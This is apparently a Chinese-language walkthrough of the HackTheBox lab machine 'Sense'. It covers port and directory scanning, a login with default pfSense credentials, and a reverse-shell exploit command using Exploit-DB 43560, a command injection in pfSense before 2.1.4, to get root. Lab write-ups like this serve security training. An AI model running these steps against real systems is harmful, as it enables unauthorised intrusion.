基本信息
                端口扫描
80和443:
1  | nmap -sC -sV 10.10.10.60  | 
80/443
是pfsense:
                目录扫描
扫一下目录,重点就两个txt:
1  | ➜ ~ gobuster dir -k -u https://10.10.10.60/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 100  | 
system-users.txt
给出用户名,密码就是默认的,搜一下就知道是pfsense:
                changelog.txt
changelog提示存在未修复漏洞:
                pfsense
使用前面得到的账号密码登录:
1  | rohit : pfsense  | 
                版本2.1.3,直接搜exploit就可以:
- pfSense < 2.1.4 - ‘status_rrd_graph_img.php’ Command Injection - PHP webapps Exploit
https://www.exploit-db.com/exploits/43560 
exploit
exp一键打:
1  | python3 exp.py --rhost 10.10.10.60 --lhost 10.10.14.6 --lport 4444 --username rohit --password pfsense  | 
                
                flags
直接是root权限,读取flags:
                参考资料
- pfSense < 2.1.4 - ‘status_rrd_graph_img.php’ Command Injection - PHP webapps Exploit
https://www.exploit-db.com/exploits/43560 - https://www.hackthebox.eu/home/machines/writeup/111
 - HackTheBox - Sense - YouTube
https://www.youtube.com/watch?v=d2nVDoVr0jE&ab_channel=IppSec